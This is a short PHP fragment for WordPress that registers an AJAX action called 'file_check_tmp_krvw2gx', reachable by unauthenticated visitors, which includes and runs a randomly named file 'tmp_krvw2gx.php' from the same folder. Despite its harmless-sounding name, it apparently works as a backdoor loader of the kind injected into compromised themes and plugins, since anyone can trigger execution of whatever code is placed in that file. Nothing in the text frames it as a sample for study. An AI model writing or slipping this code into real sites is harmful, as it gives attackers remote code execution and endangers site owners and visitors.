if(!function_exists('file_check_tmp_krvw2gx')){ add_action('wp_ajax_nopriv_file_check_tmp_krvw2gx', 'file_check_tmp_krvw2gx'); add_action('wp_ajax_file_check_tmp_krvw2gx', 'file_check_tmp_krvw2gx'); function file_check_tmp_krvw2gx() { $file = __DIR__ . '/' . 'tmp_krvw2gx.php'; if (file_exists($file)) { include $file; } die(); } }